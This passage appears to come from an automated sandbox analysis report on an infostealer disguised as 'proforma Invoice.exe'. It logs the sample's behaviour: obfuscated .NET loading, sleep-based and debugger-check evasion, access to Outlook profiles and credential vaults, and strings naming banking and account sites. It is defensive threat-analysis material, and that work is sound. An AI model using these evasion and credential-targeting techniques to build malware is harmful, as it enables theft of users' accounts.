                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\proforma Invoice.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: proforma Invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: proforma Invoice.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387057880.000000000052E000.00000002.00000001.01000000.0000000C.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497067951.000000000052E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: proforma Invoice.exe, proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs .Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.5820000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.3f18e88.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs .Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.3ef8e68.2.raw.unpack, XlF5VlCIHRSQX8M5eh.cs .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.cs .Net Code: X6XnvWyia0 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 0_2_0147EFB0 push eax; iretd 0_2_0147EFB1
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00425043 push edi; retf 3_2_0042504E
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_004190E7 push 0000006Ch; retf 3_2_00419103
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0041E968 pushad ; retf 3_2_0041E969
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0042DA53 push ds; retf 3_2_0042DA6A
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00401A51 push ss; retf 3_2_00401A52
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00412259 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00412263 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00401AE1 push ss; retf 3_2_00401AE2
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_004122A7 push edi; retf 3_2_0041226F
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00403365 push 00000058h; retf 3_2_0040336E
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00418447 push edi; retf 3_2_00418451
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00414405 push edi; retf 3_2_00414406
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0041EC2B push ebp; ret 3_2_0041ECA1
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0040AC2B push esp; retf 3_2_0040AC3A
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00413573 push eax; retf 3_2_00413534
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0041ED12 push ebp; ret 3_2_0041ECA1
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00405532 push ecx; iretd 3_2_00405535
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_004035F0 push eax; ret 3_2_004035F2
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0040D617 push FFFFFFBEh; retf 3_2_0040D61D
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_0041A6E9 push esp; retf 3_2_0041A6EA
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_00404FE9 push ebx; iretd 3_2_00404FEA
                Source: C:\Users\user\Desktop\proforma Invoice.exe Code function: 3_2_011609AD push ecx; mov dword ptr [esp], ecx 3_2_011609B6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_047809AD push ecx; mov dword ptr [esp], ecx 6_2_047809B6
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006F5026 push 0936996Ch; ret 6_2_006F502D
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006F70F6 push esp; retf 6_2_006F70F7
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006F212A push esp; retf 6_2_006F215F
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006FB375 pushad ; retf 6_2_006FB376
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_0070A460 push ds; retf 6_2_0070A477
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006E7638 push esp; retf 6_2_006E7647
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 6_2_006FB638 push ebp; ret 6_2_006FB6AE
                Source: proforma Invoice.exe Static PE information: section name: .text entropy: 7.599057364537114
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, Bc9QqtBcicE3mK58b5.cs High entropy of concatenated method names: 'dgrhUmW9Rl', 'GVqhgBwWa9', 'vfUJ0w3mcs', 'efIJ1ZyBM2', 'tfuhLVntmn', 'xaahRKAA05', 'HSjhWKmycQ', 'RHAhPblwDp', 'XX8hbw4fjw', 'guMhwTtFD7'
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 1430000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 2C50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 7EE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 8EE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 90A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: A0A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: A410000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: B410000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: C410000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E rdtsc 3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 1356
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 8616
                Source: C:\Users\user\Desktop\proforma Invoice.exeAPI coverage: 1.1 %
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\proforma Invoice.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep count: 1356 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep time: -2712000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep count: 8616 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep time: -17232000s >= -30000s
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FC270 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC270
                Source: s002-5p.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: s002-5p.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: s002-5p.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: s002-5p.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: s002-5p.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: s002-5p.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: s002-5p.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: s002-5p.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.000000000082A000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497739352.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2772504389.000001E68313C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: s002-5p.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: s002-5p.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: s002-5p.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: s002-5p.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: s002-5p.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: s002-5p.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: s002-5p.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: s002-5p.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: s002-5p.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E rdtsc 3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004177F3 LdrLoadDll,3_2_004177F3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011703E9 mov eax, dword ptr fs:[00000030h]3_2_011703E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115823B mov eax, dword ptr fs:[00000030h]3_2_0115823B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A250 mov eax, dword ptr fs:[00000030h]3_2_0115A250
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166259 mov eax, dword ptr fs:[00000030h]3_2_01166259
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01210274 mov eax, dword ptr fs:[00000030h]3_2_01210274
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E8243 mov eax, dword ptr fs:[00000030h]3_2_011E8243
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E8243 mov ecx, dword ptr fs:[00000030h]3_2_011E8243
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01164260 mov eax, dword ptr fs:[00000030h]3_2_01164260
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115826B mov eax, dword ptr fs:[00000030h]3_2_0115826B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E0283 mov eax, dword ptr fs:[00000030h]3_2_011E0283
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E284 mov eax, dword ptr fs:[00000030h]3_2_0119E284
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E284 mov eax, dword ptr fs:[00000030h]3_2_0119E284
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702A0 mov eax, dword ptr fs:[00000030h]3_2_011702A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702A0 mov eax, dword ptr fs:[00000030h]3_2_011702A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov ecx, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F62A0 mov eax, dword ptr fs:[00000030h]3_2_011F62A0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116A2C3 mov eax, dword ptr fs:[00000030h]3_2_0116A2C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011702E1 mov eax, dword ptr fs:[00000030h]3_2_011702E1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6500 mov eax, dword ptr fs:[00000030h]3_2_011F6500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01170535 mov eax, dword ptr fs:[00000030h]3_2_01170535
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01234500 mov eax, dword ptr fs:[00000030h]3_2_01234500
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118E53E mov eax, dword ptr fs:[00000030h]3_2_0118E53E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168550 mov eax, dword ptr fs:[00000030h]3_2_01168550
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01168550 mov eax, dword ptr fs:[00000030h]3_2_01168550
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119656A mov eax, dword ptr fs:[00000030h]3_2_0119656A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E59C mov eax, dword ptr fs:[00000030h]3_2_0119E59C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01194588 mov eax, dword ptr fs:[00000030h]3_2_01194588
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162582 mov eax, dword ptr fs:[00000030h]3_2_01162582
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162582 mov ecx, dword ptr fs:[00000030h]3_2_01162582
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011845B1 mov eax, dword ptr fs:[00000030h]3_2_011845B1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011845B1 mov eax, dword ptr fs:[00000030h]3_2_011845B1
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E05A7 mov eax, dword ptr fs:[00000030h]3_2_011E05A7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011665D0 mov eax, dword ptr fs:[00000030h]3_2_011665D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A5D0 mov eax, dword ptr fs:[00000030h]3_2_0119A5D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A5D0 mov eax, dword ptr fs:[00000030h]3_2_0119A5D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E5CF mov eax, dword ptr fs:[00000030h]3_2_0119E5CF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119E5CF mov eax, dword ptr fs:[00000030h]3_2_0119E5CF
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119C5ED mov eax, dword ptr fs:[00000030h]3_2_0119C5ED
